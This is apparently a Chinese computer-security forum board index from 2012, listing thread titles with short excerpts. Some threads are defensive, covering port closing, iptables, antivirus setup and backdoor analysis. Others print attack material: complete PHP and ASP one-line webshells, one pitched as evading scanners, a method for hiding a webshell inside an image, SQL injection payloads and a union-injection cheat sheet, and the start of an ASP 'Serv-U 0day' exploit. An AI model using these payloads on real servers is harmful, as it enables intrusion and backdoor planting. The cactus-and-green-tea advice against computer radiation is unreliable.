收藏本版 |订阅

电脑病毒论坛 今日: 0|主题: 1421|排名: 18 

  • 招你几教 让你防止电脑辐射
    第一招:在电脑旁放上几盆仙人掌,它可以有效地吸收辐射; 第二招:还 对于生活紧张而忙碌的人群来说,抵御电脑辐射最简单的办法就是在每天上午喝2至3杯的绿茶,吃一个橘子。茶叶中含有丰富的维生素A原,它被人体吸收后,能 迅速转化为维生素A。维生素A不但能合成视紫红质,还能使眼睛在暗光下看东西更清楚,因此,绿茶不 ...
    082 苏州老山兰 发表于 2012-5-4 其他
  • 电脑开机速度慢怎么办 教你如何解决
    电脑用久了,装的软件,插件,越来越多,所做的操作也会留下很多垃圾文件保持在电脑上,加上电脑硬件也会老化,电脑中毒什么的。都有可能导致电脑开机速度慢。 导致开机速度慢的一些原因: 1、开机启动项太多。 现在很多软件,如PDF阅读器、播放器、输入法、下载工具等软件,明明应该只是在用户需要时再打开,却悄悄给自己 ...
    069 空吟闻笛赋 发表于 2012-5-4 漏洞分析
  • php后门木马常用命令分析与防范
    php后门木马常用的函数大致上可分为四种类型:   1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open   2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13   3. 文件包含与生成: require, require_once, include, include_once, f ...
    069 华彦 发表于 2012-4-25 服务器安全
  • ThinkPHP framework 任意代码执行漏洞预警
    ThinkPHP是一个国内使用很广泛的老牌PHP MVC框架。貌似国内有不少创业公司或者项目都用了这个框架。 最近官方发布了一个安全补丁,官方表述是:该URL安全漏洞会造成用户在客户端伪造URL,执行非法代码。 可是貌似大多数开发者和使用者并没有注意到此漏洞的危害性,应者了了,更不用说有多少人去升级了。随后我对其进行了分 ...
    025 铅球 发表于 2012-4-11 服务器安全
  • 在 Windows 下关闭135/139/445端口的图文方法
    135端口主要用于使用RPC(Remote rocedure Call,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务。  端口说明:135端口主要用于使用RPC(Remote rocedure Call,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计 ...
    083 真是有趣 发表于 2012-4-10 其他
  • 在Windows 下关闭21\23\25端口的方法
    21端口主要用于FTP(File Transfer rotocol,文件传输协议)服务。 端口说明:21端口主要用于FTP(File Transfer rotocol,文件传输协议)服务,FTP服务主要是为了在两台计算机之间实现文件的上传与下载,一台计算机作为FTP客户端,另一台计算机作为FTP服务器,可以采用匿名(anonymous)登录和授权 ...
    078 桑袍茶降四高 发表于 2012-4-10 其他
  • 使用组策略增强IE安全性的设置方法
    降低浏览器遭到劫持等风险,非IE用户也可以酌情考虑一下,毕竟IE的功能拓展就目前而言是最好的。 操作步骤如下: 1.单击【开始】菜单 2.运行【gpedit.msc】进入本地组策略编辑器 3.进入【用户配置】 4.进入【管理模板】 5.进入【windows组件】 6.选择,进入【Internet Explorer】 7.寻找“禁用Internet Explorer组件自 ...
    0107 输过败过不曾怕过 发表于 2012-3-31 其他
  • McAfee 8.7i 详细讲解教程--含安装、设置以及规则编写(参照原McAfee85i教程编写)
    McAfee8.7i详细讲解教程--含安装、设置以及规则编写(参照卡饭论坛原McAfee85i教程编写)     一、McAfee8.7i安装  下载完成后,双击SetupVSE.Exe即可进入安装程序:     选择许可类型及地区:     选择自定义安装以及安装路径:     强烈建议新手选择“标准保护&rdquo ...
    090 屎科浪 发表于 2012-3-31 杀毒防毒
  • 用McAfee 8.7i 打造超安全的Web站点目录
    Web站点的安全已经受到越来越多人的关注,今天就来教给大家用McAfee 8.7i打造超安 全的Web站点目录,站长们尤其要看好了。  首先需要安装McAfee 8.7i,新手可参考McAfee8.7i详细讲解教程--含安装、设置以及规则 编写一文,本文详细讲解了McAfee 8.7i的安装以及初步设置方法。  安装完成后 右键点击右下角的McAfee ...
    020 祝我万寿无疆 发表于 2012-3-31 杀毒防毒
  • web 页面 一些sql注入语句小结
    选中 操作页面 提交数据 IP/日期 方式 /zz_article/articleshow.asp articleid=297 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))+char(124)=1 124.237.26.212 2007-11-14 SQL注入(GET) /product/productshow.asp productid=74 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as var ...
    072 悄悄心旁是肖肖 发表于 2012-3-12 服务器安全
  • php intval()函数使用不当的安全漏洞分析
    一、描述   intval函数有个特性:"直到遇上数字或正负符号才开始做转换,再遇到非数字或字符串结束时(\0)结束转换",在某些应用程序里由于对intval函数这个特性认识不够,错误的使用导致绕过一些安全判断导致安全漏洞. 二、分析 php程序员站 复制代码代码如下:   PHP_FUNCTION(intval)   {   zval **num, **arg_base; ...
    064 国酱 发表于 2012-2-10 服务器安全
  • IIS 7.0 网站漏洞利用及修复方法
    以目前流行的PHP为例: 先合并一张PHP一句话图片马,合并方法: ①、DOS合并:copy 1.gif /b + 1.txt/a php.gif ②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为<?php eval($_POST[meckun]);?> 图片随便找一张. 【顺带着说一下edjpgcom的使用方法:打开edjpgcom.exe所在文件夹,然后把你所要修改的图片拖动到edj ...
    027 朱文梅 发表于 2012-2-6 漏洞分析
  • 中文版putty后门事件分析
    根据分析,此次事件涉及到来自putty.org.cn、putty.ws、winscp.cc和sshsecure.com站点的中文版putty、 WinSCP、SSHSecure和psftp等软件,而这些软件的英文版本不受影响。 1.时间线 1月25日:新浪微博有网友发布消息称putty和winscp中装有后门程序,但该条微博并未提及后门程序的类型及其技术细节,而且消息也未被过多的人 ...
    0100 小小蕾儿 发表于 2012-2-2 业界动态
  • 分享一个不错的iptables脚本
    代码如下:复制代码代码如下:#!/bin/sh#modprobe ipt_MASQUERADEmodprobe ip_conntrack_ftpmodprobe ip_nat_ftpiptables -Fiptables -t nat -Fiptables -Xiptables -t nat -X###########################INPUT键###################################iptables -P INPUT DROPiptables -A INPUT -m state –state ESTABLI ...
    065 土豆不爱洗澡 发表于 2012-1-29 服务器安全
  • 脚本防止SSH和vsftpd的代码分享
    我随便看了看/var/log/secure日志,显示如下:复制代码代码如下:118.33.110.52=2834119.145.254.77=37121.254.179.199=226121.88.250.243=35200.29.110.104=168202.78.173.199=250222.221.2.210=373这里面除了119.145.254.77和121.88.250.243是正常的外,其它的基本都是恶意IP。由于服务器是置于LVS集群后面,所以我原来想 ...
    064 用户陌上山人 发表于 2012-1-29 服务器安全
  • serv-u最新通杀所有版本0day asp代码
    要不容易出错的。 复制代码代码如下: <style type="text/css"> <!-- body,td,th { font-size: 12px; } --> </style> <% Function httpopen(neirong,fangshi,dizhi,refer,cookie) set Http=server.createobject("Microsoft.XMLHTTP") Http.open fangshi,dizhi,false Http.setrequestheader "Referer",refer Http.setrequesth ...
    011 摯愛篤深 发表于 2012-1-29 服务器安全
  • 史上最全的各个脚本的一句话木马
    以下这个ASP一句话 <%If Request("1") "" Then ExecuteGlobal(Request("1"))%> 上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会出错,<?php ($_=@$_GET[2]).@$_($_POST[1])?> 上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会出错, 比如index.asp里面也是可以的!因为 ...
    068 遥远的宇宙某 发表于 2012-1-29 服务器安全
  • Linux实用一句话&脚本介绍
    1、查看谁破解你的ssh cat /var/log/auth.log | grep "pam_unix(sshd:auth): authentication failure;" | cut -f14 -d\ | cut -d'=' -f2 | sort | uniq -c | sort -nr 2、查看当前网络连接数 netstat -n | awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}' TCP连接状态详解 LISTEN: 侦听来自远方的TCP端口的连接 ...
    088 炎黄世家 发表于 2012-1-29 服务器安全
  • PHP 双字节、宽字节编码漏洞
    代码如下: 还是用一个demo.php显示效果,代码如下: 复制代码代码如下: <?php header("Content-Type:text/html;Charset=gb2312"); echo $_GET["str"]; //受污染的,但还有gpc echi "<br/>"; echo addslashes($_GET["str"]); //调用addslashes函数过滤有害字符 ?> 此时gpc=on。先看结果 1) http://127.0.0.1/demo.php?str ...
    092 明天休息 发表于 2012-1-25 服务器安全
  • PHP+MySQL手工注入语句大全 MySQL手工注入语句总结
    暴字段长度 Order by num/* 匹配字段 and 1=1 union select 1,2,3,4,5…….n/* 暴字段位置 and 1=2 union select 1,2,3,4,5…..n/* 利用内置函数暴数据库信息 version() database() user() 不用猜解可用字段暴数据库信息(有些网站不适用): and 1=2 union all select version() /* and 1=2 uni ...
    021 人间漫游家 发表于 2012-1-25 服务器安全
  • 下一页 »

    快速发帖

    还可输入 180 个字符
    您需要登录后才可以发帖 登录 | 立即注册

    本版积分规则

    相关侵权、举报、投诉及建议等,请发 E-mail:qiongdian@foxmail.com

    Powered by Discuz! X5.0 © 2001-2026 Discuz! Team.

    在本版发帖返回顶部